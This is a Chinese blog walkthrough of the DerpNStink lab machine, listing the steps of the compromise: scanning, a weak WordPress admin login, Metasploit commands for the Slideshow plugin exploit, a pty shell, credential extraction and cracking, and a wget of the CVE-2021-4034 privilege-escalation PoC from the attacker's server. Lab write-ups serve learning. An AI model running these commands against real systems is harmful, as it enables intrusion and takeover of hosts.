DerpNStink靶机

于 2024-08-08 21:06:33 发布
阅读量709 收藏 13
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65285254/article/details/141036349
版权

vmware打开靶机 设置网卡为NAT模式 记录MAC地址

端口扫描,主机发现

192.168.153.148

开放21.22.80端口

目录扫描

访问80端口 页面无信息

只有靶机的名字DeRPnStiNK

f12查看源码,发现第一个flag

发现文件 /webnotes/info.txt

拼接访问

根据提示,我们需要更改host文件,做host绑定,才能访问到

但不知道域名是什么

访问扫描出来的目录/php/phpmyadmin/

是一个phpmyadmin页面

拼接/robots.txt

发现一些接口

用 dirb进行目录扫描,出现许多上面没有扫出来的目录

weblog目录下存在登录页面

跳转到 http://derpnstink.local/weblog/

应该是要做host绑定的

vim /etc/hosts

访问 /weblog/wp-admin/

尝试弱口令admin admin

登录成功

发现是wordpress框架,尝试msf getshell

查看与wordpress登陆相关的exp进行利用

msfconsole

search slideshow

use 1

show option

set rhosts 192.168.153.148

set targeturi /weblog/ #设置目标的url目录地址

set wp_user admin

set wp_password admin

run

获得交互式命令行

shell

python -c 'import pty; pty.spawn("/bin/bash")'

翻看配置文件,/var/www/html/weblog发现了数据库的账号和密码

cat wp-config.php

登录成功

wp_posts 表发现 flag2.txt

在 wp_users 表发现两个账户密码

john破解后,得到wedgie57

在 home目录下发现两个用户,mrderp/stinky

su 切换用户 使用刚才破解的密码

在 ~/Desktop 下发现flag文件

使用 cve-2021-4034-poc.c 提权

github下载地址 https://github.com/arthepsy/CVE-2021-4034

靶机操作

cd /tmp

wget http://192.168.153.143:8000/cve-2021-4034-poc.c

chmod +x cve-2021-4034-poc.c

gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

运行

m0_65285254
关注
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1231
渗透学习
DerpNStink靶机渗透测试
weixin_58786230的博客
08-07 416
DerpNStink靶机
VulnHub2018_DeRPnStiNK靶机
m0_61995767的博客
08-08 911
VulnHub2018_DeRPnStiNK打靶记录
【vulnhub靶场】VulnHub2018_DeRPnStiNK靶机提权
qq_46421742的博客
07-27 362
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
DerpNStink靶机复现
weixin_52956666的博客
08-05 566
网页尝试拼接 Index of ftp://192.168.19.175/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/在反弹的shell中,进入tmp目录,从kali的web端wget下来cve-2021-4034-poc.c。dirb扫描发现了 http://derpnstink.local/weblog/wp-admin/cd ../../.. ---来到/var/www/html/weblog目录枚举信息!发现/webnotes/info.txt。
DeRPnStiNK靶机复盘
weixin_44681307的博客
07-09 380
phpmyadmin是数据库图形化管理界面,所以代表这个网页是有数据库的,我们就搜索一下wordpress的配置文件,通常数据库的账号密码都会在配置文件里面。su mrderp登陆一下,然后sudo -l发现他给了我们一个提醒,让我们在mrderp文件下创建一个binaries目录,在这个目录下创建derpy文件。发现上传成功,我们在kali中监听一下就进入到网站的后台了。sudo -l出现的这个意思就是这个目录下的这个文件是有root权限的,所以我们可以自己创建一个,然后利用这个文件进行提权。
【vulnhub】DerpNStink靶机
wbplife的博客
08-04 859
我刚开始用的是kali上面的searchsploit工具命令进行搜索版本利用搜索出来的脚本文件,但失败了,也可能是利用的脚本不对,大家可以多尝试几个脚本,看看能否成功,也希望与大家讨论。我在这找了一个有关版本的相关提权文件,有一个本地提权漏洞CVE-2021-4034, 作用有点类似于sudo,允许用户以另一个用户身份执行命令。是需要更新本地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么。通过目录扫描出来的,还有目录//weblog/wp-admin/
Vulnhub:DerpNStink 1靶机
qq_43884092的博客
04-28 1153
wordpress后台弱口令,插件Slideshow任意文件上传
VulnHub2018_DeRPnStiNK靶机总结
qq_45301512的博客
01-16 856
靶机下载地址:dl=0打开靶机,使用nmap扫描出靶机的ip和开放的所有端口可以看到,靶机开放了21端口,22端口和80端口遇到ftp的21端,我们先尝试ftp匿名登录,用户名anonymous,密码为空,发现无法ftp匿名登录那么我们然后先根据80端口打开网站,从网站入手,不行的话,在考虑ssh的爆破打开网站,并没有发现什么功能点,可以进行漏洞利用,那么开始信息收集,目录爆破一下使用dirb扫描出来,经过查看,发现一个新的网页。
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
如何derpnstink靶机渗透,大学毕业作业
06-10
如果您是在大学毕业作业的框架下进行derpnstink靶机的渗透测试,那么您应该首先了解derpnstink靶机的网络架构和安全策略,以及您的渗透测试目标和范围。您需要制定一个详细的计划,包括测试方法、工具和技术,以及...
derpnstink靶机渗透获得密码,合法的
06-10
如果您是在合法的、授权的情况下进行渗透测试,并且已经获得了密码等敏感信息,那么首先需要按照公司或组织的安全政策和程序进行报告和记录,确保这些信息不会被滥用或泄露。然后,您可以使用这些信息来进一步测试...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8485
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于RobotFramework的AutoLine开源自动化测试设计源码
10-03
该项目是AutoLine开源自动化测试平台的源码,基于RobotFramework深度定制开发,支持RobotFramework的丰富库。源码包含659个文件,其中228个为PNG图像文件,209个为CSS样式文件,95个为JavaScript脚本文件,39个为Python代码文件,21个为HTML文件,19个为XML文件,14个为GIF图像文件,6个为DS_Store文件,5个为TXT文本文件,4个为Markdown文件。
moonlight.apk
10-03
moonlight.apk
PI+重复控制的并联型单相有源电力滤波APF仿真simulink 1参考文献: 《应用于有源电力滤波器的单相谐波检测的研究》
最新发布
10-03
PI+重复控制的并联型单相有源电力滤波APF仿真simulink [1]参考文献: 《应用于有源电力滤波器的单相谐波检测的研究》瞬时无功检测算法 《单相并联型有源电力滤波器关键技术的研究》PI+重复控制 [2]参数设计:参考文献中有交流侧滤波电感、直流侧电容参数设计、电压电流PI控制器参数设计、以及单相APF的理论及原理分析,结合仿真模型一起学习 [3]控制策略及仿真效果: (1)谐波检测:采用瞬时无功功率原理方法,能兼顾单相电路谐波及无功电流检测的检测精度与动态效果 (2)双闭环控制:直流侧电压外环采用PI控制,电流内环采用P+重复控制,SPWM调制策略 (3)仿真效果: ①APF消除谐波时,可补偿一定的无功和谐波; ②补偿前,电网电流THD约20.6%;APF补偿后,电网电流THD约3.6%,低于5%。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值